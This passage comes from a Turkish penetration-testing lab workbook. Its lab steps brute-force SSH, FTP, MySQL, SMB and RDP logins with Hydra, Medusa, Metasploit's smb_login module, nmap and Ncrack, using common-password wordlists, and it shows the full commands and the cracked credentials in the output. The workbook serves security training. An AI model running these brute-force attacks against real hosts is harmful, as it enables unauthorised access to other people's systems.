parolaları ise pass.txt metin dosyalarına vi,gedit,touch,nano gibi metin editör uygulamalarından biri ile
yazabilirsiniz.
users.txtiçeriği;
root@bt:~/Desktop# more users.txt
admin
test
root
Anonymous
pass.txtiçeriği;
root@bt:~/Desktop# more pass.txt
123456
1
123
291.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
1234
12345
1234567
administrator
admin123
root
root123
toor
password
Password
Passw0rd
passw0rd
P@ssword
P@ssw0rd
2. Adım:Hydra ile sshbrute force saldırısı;;
root@bt:~/Desktop# hydra -L users.txt-P pass.txt85.95.238.173 ssh -s 443
Hydra v7.3 (c)2012 by van Hauser/THC& David Maciejak - forlegal purposesonly
Hydra (http://www.thc.org/thc-hydra) starting at2012-12-02 19:57:50
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have
10 secondsto abort...
[DATA] 16 tasks,1 server,20 login tries (l:2/p:10), ~1 try per task
[DATA] attacking servicessh on port443
[443][ssh] host:85.95.238.173 login: test password:passw0rd123
[STATUS] attackfinished for85.95.238.173 (waiting forchildren to finish)
1 of 1 targetsuccessfuly completed,1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at2012-12-02 19:58:09
-s parametresi, default ssh portu dışında bir port üzerinden ssh denemesi yapmak istenilirse
kullanılır.Örnekte 443portu üzerindensshkabakuvvetsaldırısıdenenmiştir.
3. Adım:Hydra ile ftpbrute force saldırısı;
root@bt:~/Desktop# hydra -L users.txt-P pass.txt85.95.238.173 ftp -e n
Hydra v7.3 (c)2012 by van Hauser/THC& David Maciejak - forlegal purposesonly
Hydra (http://www.thc.org/thc-hydra) starting at2012-12-02 20:06:27
292.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have
10 secondsto abort...
[DATA] 16 tasks,1 server,22 login tries (l:2/p:11), ~1 try per task
[DATA] attacking serviceftpon port21
[STATUS] attackfinished for192.168.1.102 (waiting forchildren to finish)
[21][ftp] host:85.95.238.173 login:Anonymous password:
1 of 1 targetsuccessfuly completed,1 valid passwordsfound
Hydra (http://www.thc.org/thc-hydra) finished at2012-12-02 20:06:41
-e parametresine verilecek değer ile kullanıcı adları parolasız denensin(n) veya parola olarak kullanıcı adı
kullanılmasını(s) sağlamaktadır.Örnekte -e n şeklinde kullanılarak boş parolaları da denemesi
sağlanmıştır.Anonymouskullanıcısıparolasızolarakloginolunabilmektedir.
4. Adım:Hydra ile mysql servisine yönelikkabakuvvetsaldırısı;
root@bt:~/Desktop# hydra -L users.txt-P pass.txt85.95.238.173 mysql -e ns
Hydra v7.3 (c)2012 by van Hauser/THC& David Maciejak - forlegal purposesonly
Hydra (http://www.thc.org/thc-hydra) starting at2012-12-02 20:06:27
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have
10 secondsto abort...
[DATA] 16 tasks,1 server,22 login tries (l:2/p:11), ~1 try per task
[DATA] attacking servicemysqlon port3306
[STATUS] attackfinished for85.95.238.173 (waiting forchildren to finish)
[3306][mysql] host:85.95.238.173 login:root password:toor
1 of 1 targetsuccessfuly completed,1 valid passwordsfound
Hydra (http://www.thc.org/thc-hydra) finished at2012-12-02 20:06:41
Ek Kaynaklar:
---
Uygulama No:BGA-PT-91
Uygulama Adı: Medusa Kullanarak SSH, FTP Servislerine Yönelik Brute Force
Amaç: Medusaile canlısistemlereyönelikonline parolakırmasaldırısı gerçekleştirme
KullanılanAraçlar:
Medusa
Adımlar:
1. Adım:Medusa kullanarakSSHkabakuvvetsaldırılarıgerçekleştirme;
293.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
root@bt:~/Desktop# medusa -h 6.6.6.54 -Uusers.txt -P pass.txt-M ssh-F
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun /FoofusNetworks<jmk@foofus.net>
ACCOUNT CHECK: [ssh] Host: 6.6.6.54 (1 of 1, 0 complete) User: admin (1 of 2, 0 complete) Password:
123456 (1 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 6.6.6.54 (1 of 1, 0 complete) User: admin (1 of 2, 0 complete) Password: 1
(2 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 6.6.6.54 (1 of 1, 0 complete) User: admin (1 of 2, 0 complete) Password:
123 (3 of 17 complete)
-M ssh ile ssh modülünü kullanmak istediğimiz belirtiyoruz.Medusada kendisine sağlanan hesapları 22.
portta deniyor.
2. Adım:Medusa kullanaraftphesaplarınayönelikkabakuvvetsaldırıları;
root@bt:~/Desktop# medusa -h 139.124.134.1 -U users.txt-P pass.txt-M ftp -F
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun /FoofusNetworks<jmk@foofus.net>
ACCOUNT CHECK: [ftp] Host: 139.124.134.1 (1 of 1, 0 complete) User: admin (1 of 2, 0 complete)
Password:123456 (1 of 17 complete)
ACCOUNT CHECK: [ftp] Host: 139.124.134.1 (1 of 1, 0 complete) User: admin (1 of 2, 0 complete)
Password:1(2 of 17 complete)
ACCOUNT CHECK: [ftp] Host: 139.124.134.1 (1 of 1, 0 complete) User: admin (1 of 2, 0 complete)
Password:123 (3 of 17 complete)
ACCOUNT CHECK: [ftp] Host: 139.124.134.1 (1 of 1, 0 complete) User: admin (1 of 2, 0 complete)
Password:1234 (4 of 17 complete)
-M ftp ile ftp modülünü kullanmak istediğimiz belirtiyoruz. Medusada kendisine sağlanan hesapları 21.
portta deniyor.
Ek Kaynaklar:
---
Uygulama No:BGA-PT-92
Uygulama Adı: Metasploit Aux Kullanarak Windows ParolaBrute Force Atakları
Amaç: İlgili metasploityardımcımodülleri kullanılarakparolakırmasaldırıları
KullanılanAraçlar:
Metasploitauxiliarymodüller
Adımlar:
294.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
1. Adım: Metasploit aux scanner modüllerinden smb_login ile belli bir ağdaki windows makinalara
yönelikkabakuvvet(bruteforce) saldırıları;
root@bt:~/Desktop# msfconsole
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) >showoptions
Moduleoptions(auxiliary/scanner/smb/smb_login):
Name CurrentSetting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blankpasswordsforallusers
BRUTEFORCE_SPEED 5 yes How fastto bruteforce,from0 to 5
PASS_FILE no File containing passwords,oneperline
PRESERVE_DOMAINS true no Respect a usernamethatcontainsa domain name.
RECORD_GUEST false no Record guest-privileged randomloginsto thedatabase
RHOSTS yes The targetaddressrangeor CIDRidentifier
RPORT 445 yes Set the SMBservice port
SMBDomain WORKGROUP no SMBDomain
SMBPass no SMBPassword
SMBUser no SMBUsername
STOP_ON_SUCCESS false yes Stop guessing when a credential worksfora host
THREADS 1 yes The numberof concurrentthreads
USERPASS_FILE no File containing users and passwords separated by space, one
pair per line
USER_AS_PASS true no Try the usernameasthe password forallusers
USER_FILE no File containing usernames,oneperline
VERBOSE true yes Whetherto print outputforall attempts
msf auxiliary(smb_login) >
msf auxiliary(smb_login) >set RHOSTS 6.6.6.0/26
RHOSTS=> 6.6.6.0/26
msf auxiliary(smb_login) >set SMBUser test
SMBUser=> test
msf auxiliary(smb_login) >set SMBPass passw0rd
SMBPass=> passw0rd
msf auxiliary(smb_login) >exploit
[*] 6.6.6.0:445 SMB - Starting SMB login bruteforce
[*] 6.6.6.1:445 SMB - Starting SMB login bruteforce
…
…
295.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
…
Ek Kaynaklar:
---
Uygulama No:BGA-PT-93
Uygulama Adı: Ncrack Kullanarak RDP Brute Force Atakları
Amaç: Birsubnetteki tümsistemlere remotedesktopprotokolünebrute force saldırısıgerçekleştirme
KullanılanAraçlar:
Ncrack
Adımlar:
1. Adım:Bulunduğumuznetworkteki RDP(3389) servisi açıkolanlarıbulalım;
root@bt:/pentest/enumeration/dns/fierce# nmap 6.6.6.0/24 -p 3389 --open -n -PN | grep for | cut -d '
' -f5
6.6.6.57
6.6.6.84
6.6.6.97
6.6.6.110
6.6.6.197
6.6.6.198
6.6.6.199
2. Adım:Bu IP adreslerinibirdosyayayazalım;
root@bt:/pentest/enumeration/dns/fierce# nmap 6.6.6.0/24 -p 3389 --open -n -PN | grep for | cut -d '
' -f5 >> /root/Desktop/rdpopen.txt
3. Adım: Saldırıda kullanılacak kullanıcı adlarını bir dosyaya yazdırıyoruz.Bunun için vi,nano,gedit gibi
metineditörlerindenfaydalanılabilir.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
BGA Bilgi Güvenliği A.Ş. Hakkında
BGA Bilgi Güvenliği A.Ş. 2008 yılından bu yana siber güvenlik alanında faaliyet göstermektedir.
Ülkemizdeki bilgi güvenliği sektörüne profesyonel anlamda destek olmak amacı ile kurulan BGA Bilgi
Güvenliği, stratejik siber güvenlik danışmanlığı ve güvenlik eğitimleri konularında kurumlara hizmet
vermektedir.
Uluslararası geçerliliğe sahip sertifikalı 50 kişilik teknik ekibi ile, faaliyetlerini Ankara ve İstanbul ve
USA’da sürdüren BGA Bilgi Güvenliği’nin ilgi alanlarını “Sızma Testleri, Güvenlik Denetimi, SOME, SOC
Danışmanlığı, Açık Kaynak Siber Güvenlik Çözümleri, Büyük Veri Güvenlik Analizi ve Yeni Nesil
Güvenlik Çözümleri”oluşturmaktadır.
Gerçekleştirdiği başarılı danışmanlık projeleri ve eğitimlerle sektörde saygın bir yer edinen BGA Bilgi
Güvenliği, kurulduğu günden bugüne alanında lider finans, enerji, telekom ve kamu kuruluşlarına
1.000'den fazlaeğitimve danışmanlıkprojelerigerçekleştirmiştir.
BGA Bilgi Güvenliği, kurulduğu 2008 yılından beri ülkemizde bilgi güvenliği konusundaki bilgi ve
paylaşımların artması amacı ile güvenlik e-posta listeleri oluşturulması, seminerler, güvenlik etkinlikleri
düzenlenmesi, üniversite öğrencilerine kariyer ve bilgi sağlamak için siber güvenlik kampları
düzenlenmesi ve sosyal sorumlulukprojeleri gibi birçokkonudagönüllüfaaliyetlerde bulunmuştur.
BGA Bilgi Güvenliği AKADEMİSİ Hakkında
BGA Bilgi GüvenliğiA.Ş.’nin eğitimve sosyalsorumlulukmarkasıolarakçalışanBilgi Güvenliği
AKADEMİSİ,sibergüvenlikkonusundaticari,gönüllüeğitimlerindüzenlenmesi ve sibergüvenlik
farkındalığını arttırıcı gönüllüfaaliyetleri yürütülmesindensorumludur.Bilgi Güvenliği AKADEMİSİ
markasıylabugüne kadar“SiberGüvenlik Kampları”,“SiberGüvenlikStaj Okulu”,“SiberGüvenlikAr-Ge
DestekBursu”, ”Ethical Hacking yarışmaları” ve “SiberGüvenlikKütüphanesi” gibi birçok gönüllü
faaliyetindestekleyici olmuştur.